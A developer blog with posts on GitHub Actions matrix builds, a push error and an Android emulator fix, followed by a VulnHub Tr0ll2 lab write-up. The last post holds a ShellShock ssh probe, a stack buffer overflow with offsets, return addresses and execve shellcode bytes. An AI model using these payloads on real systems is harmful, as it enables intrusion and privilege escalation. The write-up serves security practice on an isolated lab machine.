GitHub Actions, second round

After managing to run build and test in my GitHub Actions workflow, it is time to experiment with the matrix feature to have the build run on multiple OSes. This can be tricky if (like me) you use some Docker images (MongoDb, SQL Server), because when you choose a Windows machine you are using Windows Container services, not standard Docker for Windows. This means that you are not able to run standard Linux-based Docker containers; you need to use Windows Container based images.

GitHub Actions Windows-based machines run Windows Containers, not Linux ones.

This is especially annoying for me because it seems that there is no SQL Server image available for Windows Server 2019.

Figure 1: The Docker image for SQL Server does not support Windows Server 2019.

OK, I’m forced to use Windows Server 2016, when I would really have preferred Windows Server 2019, which has much better container support.

Apart from these difficulties, GitHub Actions saved my day because it allows me to define new variables depending on matrix values, thus letting me use different container commands for different operating systems, as you can see in Figure 2.

Figure 2: Different msssql and mongoContainer variable values depending on the operating system.

Thanks to the include directive, I’m able to give different values to job variables. I’m creating two new variables, msssql and mongoContainer, that contain the command lines used to start the MsSql and MongoDb containers. This is important because, on Windows, the MsSql container image gave me problems if I used ‘ instead of “. With the include directive I’m able to specify a completely different run command line for each operating system.

This is also fundamental because I need to use two different container images for MsSql, since they differ between operating systems. On Linux I can use mcr.microsoft.com/mssql/server:2017-latest-ubuntu, while for Windows 2016 (but not for Windows 2019) I have to use microsoft/mssql-server-windows-developer.
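Here is a minimal sketch of the idea; the variable names come from the figure, while the exact command lines (especially the Windows one) are my assumption:

strategy:
  matrix:
    dotnet: ['2.2.401']
    os: ['ubuntu-latest', 'windows-2016']
    include:
      # on Linux single quotes work fine and the Linux image is used
      - os: 'ubuntu-latest'
        msssql: docker run -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=sqlPw3$secure' -p 1433:1433 --name msssql -d mcr.microsoft.com/mssql/server:2017-latest-ubuntu
        mongoContainer: docker run -d -p 27017:27017 mongo
      # on Windows I need double quotes and a Windows Container image
      - os: 'windows-2016'
        msssql: docker run -e "ACCEPT_EULA=Y" -e "SA_PASSWORD=sqlPw3$secure" -p 1433:1433 --name msssql -d microsoft/mssql-server-windows-developer
        mongoContainer: docker run -d -p 27017:27017 mongo

The step that starts the container then simply runs the variable for the current combination:

steps:
  - name: Start Docker for MsSql
    run: ${{ matrix.msssql }}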

Thanks to the include directive, I can change the value of job variables depending on the matrix combination.

The net result is that my action now runs on both operating systems.

Figure 3: The action now runs on both operating systems. I still get an error from the Mongo tests because of a container problem on Windows, but that is a different story.

If I want to run my build and tests also against .NET Core 3 RC, I can simply add another value to the dotnet matrix et voilà, now I get four different runs of my workflow; the change is sketched below.
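One more entry in the matrix is all it takes (the version number here is the preview version I used elsewhere, so treat it as an example):

matrix:
  # two framework versions x two operating systems = four runs
  dotnet: ['2.2.401', '3.0.100-preview9-014004']
  os: ['ubuntu-latest', 'windows-2016']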

Figure 4: Running actions with a matrix; the cross product of all variables allows me to run the action on every combination of operating system and .NET Core framework.

Thanks to the max-parallel setting, I ask the system to run only two builds in parallel, while with fail-fast equal to false I’m asking GitHub to always run all the combinations, even if a previous combination fails. This allows me to always have all four runs executed, regardless of the outcome of a previous one.
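Both settings live in the strategy section; a minimal sketch, assuming the matrix above:

strategy:
  max-parallel: 2   # at most two jobs run at the same time
  fail-fast: false  # a failing combination does not cancel the others
  matrix:
    dotnet: ['2.2.401', '3.0.100-preview9-014004']
    os: ['ubuntu-latest', 'windows-2016']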

I can also use exclude to remove some combinations from the matrix cross product; in Figure 5 I’m excluding the .NET Core 3 run on the Windows machine.

Figure 5: Excluding a specific combination from the matrix cross product.
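In YAML the exclusion looks roughly like this (a sketch, assuming the matrix values used above):

strategy:
  matrix:
    dotnet: ['2.2.401', '3.0.100-preview9-014004']
    os: ['ubuntu-latest', 'windows-2016']
    exclude:
      # do not run .NET Core 3 on the Windows machine
      - os: 'windows-2016'
        dotnet: '3.0.100-preview9-014004'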

This generates a total of three runs: both framework versions are built on the Linux machine, but only 2.2.401 on the Windows machine.

Include and exclude are powerful matrix configurations that allow you to configure a job differently or to exclude some matrix combinations entirely, allowing fine-grained control over the jobs that get scheduled.

Everything is really good, but here are some problems that I encountered while using Actions; this is completely understandable, because the product is still in beta.

Running on a Windows machine is slower than on Linux. I do not know if this is a problem with the Docker images, but in Figure 6 you can see the timing of the action on Linux (red square) and on Windows (blue square). I suspect the Windows machines run on much slower hardware. Nevertheless, pay attention to timing: if you are building .NET Core, Linux is probably the best choice (better container support and faster on GitHub Actions).

Figure 6: Timing of the action run on Linux and Windows machines.

Another area where Actions need improvement is the concept of a partially failing action, as we have had for years in Azure DevOps (TFS). The concept is: when I run a series of tests, I do not want the entire job to stop if one test run fails; I want that step to be reported as failed, execution to continue with the next step, and the whole action to be marked as “partially failed” if any step marked with continue-on-error failed. This kind of CI workflow is standard: do not stop the script, just continue and mark the single step as failed.

It is true that GitHub Actions has a continue-on-error property, but it simply reports the step as succeeded even if it fails; this is a really annoying missing feature.
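For reference, this is how the property is applied to a single step (a sketch based on my test steps):

- name: Run Tests - MongoDb
  continue-on-error: true   # a failure here does not stop the job, but the step shows as green
  run: dotnet test src/NStore.Persistence.Mongo.Tests/NStore.Persistence.Mongo.Tests.csproj --configuration Release --no-build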

Figure 7: continue-on-error actually marks the step as succeeded even if it fails.

As you can see from Figure 7, the step failed (2 tests failed), but it is marked as successful (due to continue-on-error) and the overall execution is green. This is a real missing feature for complex projects where you want to execute every step and visualize which ones failed.

This second round of tests confirmed that GitHub Actions is a powerful build system, but it is still in its early days and needs more work to be really usable on complex projects.

Gian Maria.

GitHub Actions: error pushing a modified workflow

After creating a workflow for GitHub Actions, if you modify the workflow locally and then push to GitHub, you can incur a strange error:

refusing to allow an integration to create or update .github/workflows/ci.yml

Figure 1: Error pushing to the Git repository.

The reason seems to be a permission difference in the auth token used for authentication, so to solve the problem you need to clear your credentials and then retry the operation. On Windows you can use Credential Manager, as I described in that old post. Just delete every entry for GitHub, then try to push again; you will be asked for credentials again and you should be able to push.

Figure 2: I got the error, cleared the credentials in Credential Manager, and finally I was able to push again.

Let me know if you still have the error.

Gian Maria.

First Experience with GitHub Actions

GitHub Actions is the new CI/CD system created by GitHub that allows you to build and release your software with a simple workflow defined in a YAML file. It is currently in beta, but you can simply request to be enlisted and your account will be enabled so you can try it in preview.

The Actions engine is based on a YAML definition stored directly in the code; there are lots of predefined actions made by the GitHub team, as well as custom actions developed by the community. The real power lies in the fact that you can simply use command line and Docker commands, making the creation of a release a simple and smooth process.

Adding a new workflow is really simple: just open the Actions tab of the repository, then ask to create a new workflow:

Figure 1: Create a new workflow for GitHub Actions directly from the repository page.

This simply creates a new yml file in the .github/workflows directory and you can immediately start editing the build. The syntax aims at simplicity rather than complexity; the vast majority of tasks can be accomplished simply by inserting command line instructions.

My first impression is that the strongest points of GitHub Actions are simplicity and ease of use.

Here is the first part of the workflow definition:

name: NStore CI

on: [push]

jobs:
  build:
    runs-on: ${{ matrix.os }}
    strategy:
      matrix:
        dotnet: [ '2.2.401', '3.0.100-preview9-014004'] 
        os: ['ubuntu-latest']
    name: Build for .NET ${{ matrix.dotnet }}
    steps:

You can find the complete workflow syntax at this page, but here is the explanation of my workflow. First of all, the on: [push] directive asks for continuous integration (run the action for each push); then a list of jobs follows.

The first and only job in this example is called build, and it can run on different operating systems. This is a nice feature of Actions called matrix: you can define arrays of values and use them in the workflow definition to have it run multiple times, once for each parameter combination. Arrays of values are defined inside the strategy.matrix section, where I defined two distinct sets of parameters: dotnet (the version of .NET Core used to build) and os (the type of machine where my action should run). For this example I’m going to use only the framework version as a matrix value.

The runs-on property defines the OS; for this example I’m using ubuntu-latest. Finally, I give the job a name: Build for .NET followed by the actual matrix.dotnet value. When I push the code I can verify that two distinct jobs are scheduled.

Figure 2: Two distinct jobs were scheduled, one for each matrix version.

This is a really nice feature because we can specify a single workflow and have the GitHub Actions engine run it with different configurations.

Thanks to matrix configuration, a single job can be run for many different combinations of input parameters.

A job is simply composed of different steps; for my solution I only want to build it and run some tests against Microsoft SQL Server and MongoDb:

steps:     
    - uses: actions/checkout@v1
    
    - name: Setup .NET Core
      uses: actions/setup-dotnet@v1
      with:
        dotnet-version: ${{ matrix.dotnet }}
      
    - name: Build with dotnet
      run: dotnet build src/NStore.sln --configuration Release
    
    - name: Start Docker for MSSSql
      run: docker run -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=sqlPw3$secure' -e 'MSSQL_PID=Developer' -p 1433:1433 --name msssql -d mcr.microsoft.com/mssql/server:2017-latest-ubuntu
      
    - name: Start Docker for Mongodb
      run: docker run -d -p 27017:27017 mongo
      
    - name: Dump mssql docker logs
      run: docker logs msssql
      
    - name: Run Tests - Core
      run: dotnet test src/NStore.Core.Tests/NStore.Core.Tests.csproj --configuration Release --no-build

    - name: Run Tests - Domain
      run: dotnet test src/NStore.Domain.Tests/NStore.Domain.Tests.csproj --configuration Release --no-build
    
    - name: Run Tests - MongoDb
      env:
        NSTORE_MONGODB: mongodb://localhost/nstore
      run: dotnet test src/NStore.Persistence.Mongo.Tests/NStore.Persistence.Mongo.Tests.csproj --configuration Release --no-build
           
    - name: Run Tests - MsSql
      env:
        NSTORE_MSSQL: Server=localhost;user id=sa;password=sqlPw3$secure
      run: dotnet test src/NStore.Persistence.MsSql.Tests/NStore.Persistence.MsSql.Tests.csproj --configuration Release --no-build
    
    - name: Dump mssql docker logs after tests
      run: docker logs msssql
      
    - name: Run Tests - Sql Lite
      run: dotnet test src/NStore.Persistence.Sqlite.Tests/NStore.Persistence.Sqlite.Tests.csproj --configuration Release --no-build 

The workflow starts with actions/checkout@v1, a standard action that simply clones and checks out the code. It is followed by another action that ensures a specific version of the .NET Core SDK is installed and configured on the system. It is declared with the syntax uses: actions/setup-dotnet@v1 and allows me to use a specific version of .NET Core; this action accepts parameters, so it is followed by a with: section used to pass them. This is another strong point of GitHub Actions: it is really simple to declare and use actions, with no need to install or reference anything; just reference the action in the right repository and the game is done.

The rest of the workflow is a series of steps composed only of a name and a command line instruction. This allows me to simply issue dotnet commands to restore, build, and test my solution.

Another cool aspect of Actions is that Docker is available inside the machine; this allows me to run a couple of containers, SQL Server and MongoDb, to run my tests during a build. This is super cool, because it allows me to use Docker to create all the prerequisites I need for my build.

Having Docker inside the machine that runs actions is a real blessing, because it allows running integration tests.

My first impression is quite positive: with just a bunch of YAML code I was able to create a workflow to build and run tests for my project (I spent quite a good amount of time getting the MsSql container to work, but that is another story).

Another good aspect of Actions is the ability to see the real-time log of your run directly from a browser, without installing anything.

A final really nice aspect of Actions is that they are defined by convention inside a special folder, .github/workflows; I developed this build in a fork of the original project, then issued a pull request, and when the pull request was accepted the new workflow appeared in the original repository.

Figure 3: After the pull request was merged, the workflow was immediately up and running on the target repository.

Clearly this is still a beta and there are parts that should be improved. First of all, if a test run fails, the build is marked as failed and you need to look at the test logs to understand which tests failed.

Figure 4: The build failed, but to understand why you need to check the logs.

This is the reason why I included a distinct test step for each test assembly, instead of a single dotnet test on the entire solution. Using this little trick I can at least understand which test run failed.

Figure 5: Action run result; each failed step is marked with a red cross.

Clicking on a failed step, you can find its output log, needed to understand which tests failed and why. Those of you used to Azure DevOps pipelines will surely miss the nice Test Result page, but I expect GitHub Actions to close the gap in this area.

Figure 6: Action step run detail.

Another problem I found (but I need to investigate more) is that Docker seems not to be available on macOS machines. If I run the previous build on macOS I get a docker command not found error.

You only need to enlist in the beta and start playing with Actions; you will surely find a good use for them.

Gian Maria.

Unable to use Android Emulator: ADB_VENDOR_KEYS error

I’m working with Xamarin, but on my workstation, where my user has no administrative rights, I’m not able to run the emulator, even if I start everything with an administrative user:

Device unauthorized, ADB_VENDOR_KEYS is not set

Figure 1: Error running the emulator.

I have a nearly identical setup on another computer, where the user is an admin of the machine and everything works. I found some solutions on the internet, but nothing worked, until I found some clues that this error is somehow related to the Google Play Store.

Figure 2: Removing the Play Store from the emulator settings.

The first step was removing the Google Play Store from the emulator configuration; then I also needed to force a cold boot, because for some reason fast boot just does not work on my system.

Figure 3: Disable fast boot and force a cold boot.

On a decent developer machine a cold boot is fast, so it is absolutely not a problem for me. Now I’m able to use the emulator with Xamarin.

Gian Maria.

Exploiting VulnHub Tr0ll2 machine

This is an unusual post: it deals with how I exploited the Tr0ll2 machine from VulnHub. Practicing with real machines helps you put into practice some of the stuff you learn about security. It has been a really long time (almost 20 years) since I last immersed myself in security, and doing some exercises on a machine is a good way to spend some hours :).

I run all the machines on a VMware ESXi server, in an isolated network, behind a router and a firewall, with a DNS on my Kali Linux machine. I’m pretty cautious when I run such machines on my network, so it is always good for me to have a completely separate network, isolated from my real work network. Thanks to VMware I can simply use the console to access the machine even if I cannot contact it directly through the network.

First of all I check the DHCP server leases to find the IP assigned to the troll machine, an easy task.

Figure 1: Just check the leases in /var/lib/dhcp/dhcpd.leases to find the IP of the tr0ll2 machine.

Now a simple nmap scan reveals ports 80, 21 and 22 open. Starting with port 80 I did some checks with Burp Suite, but I did not find anything useful, just the standard troll image.

Figure 2: Nothing interesting on the home page.

This type of machine does not need brute force, but, remembering the first machine of the series, I checked robots.txt, which reveals a series of possible subdirectories. To avoid testing every entry manually, simply save the file and then use software like dirb or OWASP DirBuster to check every entry in it.

Figure 3: Some directories found by DirBuster.

All four directories contain the very same image, but after saving them to disk, one turns out to be slightly larger than the others. Using the strings program you can notice a strange string embedded in the image.

Figure 4: String embedded in the image.

After some attempts (I tried various things on the web site) came the light at the end of the tunnel: maybe y0ur_self is some file or directory on the web server, and voilà, another hidden directory.

Figure 5: Content of the hidden folder, a file with answers.

Opening the file I found some encoded strings. It looks like Base64, and there are lots of internet sites that can try various encodings for you to avoid losing time.

Figure 6: OK, indeed it is a Base64 string :)

The first thing to do is convert all these Base64 strings into plain strings; a few lines of Python code solved the problem.
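Something along these lines (a sketch; the file names are hypothetical):

import base64

# answers.txt holds the Base64 lines saved from the server (hypothetical names)
with open('answers.txt') as source, open('decoded.txt', 'w') as out:
    for line in source:
        line = line.strip()
        if line:
            out.write(base64.b64decode(line).decode('ascii', errors='replace') + '\n')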

Figure 7: Decoding with Python; as you can see, I’m using Visual Studio Code for the task.

Once I had a nice file with lots of strings, the obvious thing to do was to try these passwords on ssh or ftp; sadly, nothing worked. I tried root as the user (I was pretty sure that was not the user, because it would be too easy), I tried the Tr0ll user (because of the username on the home page of the site), but nothing.

Now I need to admit I cheated: after being stuck for a while, after hydra and various other tools to brute force either ftp or ssh, I searched for a hint on the internet :D

I was a little bit disappointed, because the next step is not really logical: the ftp user is Tr0ll with Tr0ll as password. I really did not expect such an easy solution.

Moving on, on the ftp server I found a single zip file, protected with a password. This time the nice list of decoded strings contains the password for the zip file.
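A quick dictionary attack with the decoded strings takes only a few more lines of Python (again a sketch with hypothetical file names):

import zipfile

archive = zipfile.ZipFile('archive.zip')
with open('decoded.txt') as words:
    for word in words:
        try:
            # extraction only succeeds when the password is right
            archive.extractall(pwd=word.strip().encode())
            print('Password found:', word.strip())
            break
        except Exception:
            pass  # wrong password, try the next one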

Figure 8: Cracking the zip file.

Inside the zip file there is another file, a nice RSA key used to log in over SSH.

Figure 9: Finally, a key to log in with SSH.

I tried the user Tr0ll without any success; then, since the file is called noob, I tried the user noob (remembering the trick of the ftp) and it worked, but no console was available: I was kicked out immediately.

Figure 10: Trolled again :(

OK, now I need to understand why the ssh server kicks me out every time; using the -v option I can ask for verbose diagnostics of what is happening between client and server.

Figure 11: Debug output of my ssh connection.

The output is not really informative, but I tried googling everything, especially the string “remote: forced command”, which suggested that the server has some sort of command whitelist. I found that it is possible to configure SSH to execute only certain commands, so I tried different commands; nothing worked.

After some more time googling, I found that ssh forced commands can be vulnerable to ShellShock; I was really excited and tried to open a shell exploiting the ShellShock bug.
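The classic probe looks something like this (a sketch; the user and key names come from the previous steps, and the exact command I ran may have differed):

# if the forced command runs under a vulnerable bash, the function
# definition in the command string is parsed and the trailing command executes
ssh -i noob noob@<target-ip> '() { :;}; /bin/bash'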

Figure 12: ShellShock worked, and I was really trolled.

HOORAY, ShellShock worked and I was in, but I could not use ls to list files: pwd worked, some other commands worked, but ls gave me permission denied. After browsing with find, for some reason I tried the dir command and, LOL, dir works like ls, as you can see in Figure 12. This was the most troll moment of this hack; I was really shocked :D

Once in, you can find some interesting folders.

Figure 13: Finally some interesting files.

I found three distinct r00t files inside three folders; all are executables, but running them simply kicks me out of the ssh session for a while. After being puzzled, I realized that one of the files is bigger than the others, and that it is always in a different place :) This explains why all three kicked me out of ssh: I ran the file in door1, then door2, then door3, but probably it was always the same file. As with the images with the embedded string, the file with a different size was probably the interesting one.

Figure 14: The solution is near.

OK, now I’m really frustrated. The reason is that I found a file that has setuid root and does nothing but output the string I give it as input; thus, the author expects me to perform a stack overflow exploit, because this is the typical test program used in books like The Shellcoder’s Handbook. Uff, it has been more than 15 years since I last smashed a stack, and lots of stuff has changed with ASLR and other mitigations, so I decided to call it a day and give up. I’d had enough fun with the machine.

……
……

After a couple of days I still had a bitter taste in my mouth: I was so close to finishing the machine, I could not surrender. Thanks a lot to Pluralsight (you guys have tons of exceptional courses), I found a course on creating exploits with Metasploit, and the TOC revealed that it could be a refresher for my rusty buffer overflow knowledge. The course was great and it gave me all the tools I needed to attempt the exploit. The r00t file is 32 bit, so I do not have to deal with a 64 bit stack; it turns out this could be easier than I thought.

Step 1: use the Metasploit utility that creates a payload that allows me to locate the offset at which the EIP register gets overwritten. The utility is pattern_create.rb and, given a length (in this example 300 chars), it generates a unique string that allows me to locate the right offset.

Figure 15: pattern_create.rb in action.

Now I can launch the r00t program inside the gdb debugger (I have no fancy GUI debugger over ssh and ShellShock, but luckily I’m old enough to be familiar with command line debuggers). Just run gdb r00t, then after the debugger starts type run followed by the argument, using patterns of increasing length until the program crashes.

Figure 16: The debugger shows the crash and the instruction that causes the segmentation fault.

The situation is the following: I overwrote the stack with the specific sequence of chars generated by pattern_create.rb, and the offending pointer is 0x6a413969, which is now the content of the EIP register, the next instruction pointer. Now I can use another tool called pattern_offset.rb, feeding it that value.

Figure 17: pattern_offset.rb allows me to easily find the offset.

As you can see in Figure 17, with Metasploit finding the offset is a breeze: the EIP overwrite is at offset 268. Now I simply followed the instructions of the Pluralsight course, trying to get a better understanding of what happened. Using Python it is really simple to generate a pattern to verify the assumption.
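Something like this (a sketch of the kind of pattern I generated):

import sys

# 268 bytes to reach the saved return address, four Bs that should land
# in EIP, then a run of Cs that should end up where ESP points
sys.stdout.buffer.write(b'A' * 268 + b'B' * 4 + b'C' * 100)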

Figure 18: Creating a specific pattern to verify what is in memory.

Using that specific pattern allows me to verify what is in stack memory after the buffer overflow.

Figure 19: Registers after the buffer overflow.

OK, the assumptions are right: the EBP register contains a sequence of A characters, and EIP contains a sequence of Bs; this confirms that the offset is good. Then I dumped the memory pointed to by the ESP register to verify what is on the stack, and I found all Cs. Everything is good and ready to run. I did one final test: instead of using all Cs after the EIP pointer, I put 40 bytes of \x90 (NOP instructions). Here is the result.

Figure 20: Memory layout pointed to by ESP after the overflow.

As you can see from Figure 20, at the memory address pointed to by ESP (0xbffffb10) there are my 40 NOPs and then the Cs. Now I only need a payload; remembering The Shellcoder’s Handbook, I searched for a simple execve shell on exploit-db, and the result is:

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

This is really nice; I really love shellcode, it is almost magic: binary code that can be forced into a program to be executed. Now I verify again the layout of the memory after the overflow with this new code.

Figure 21: The buffer overflow is almost ready.

It is really important to do this final run with the exact length of the payload. From Figure 21 I can easily see my 40-byte NOP sled starting at 0xbffffb60, followed by my shellcode. As a first attempt I tried to overwrite EIP with 0xbffffb68 (Figure 22; remember that x86 is little endian); if everything is OK, after the overflow the execution will jump into my NOP sled and finally execute the shellcode, launching a new bash as root (remember that the r00t program has setuid root).
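Reconstructed in Python, the final payload looks roughly like this (a sketch; the offset and addresses come from the debugging session above):

import struct
import subprocess

# execve /bin/sh shellcode from exploit-db
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

ret = struct.pack('<I', 0xbffffb68)  # address inside the NOP sled, little endian
payload = b'A' * 268 + ret + b'\x90' * 40 + shellcode

# r00t is the setuid binary found on the machine
subprocess.call([b'./r00t', payload])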

Figure 22: Final shellcode.

I was really excited and really surprised when it worked at the very first attempt. Many thanks to Gus Khawaja for his course; it gave me all the information I needed.

Figure 23: I’m Groot :P

Gian Maria.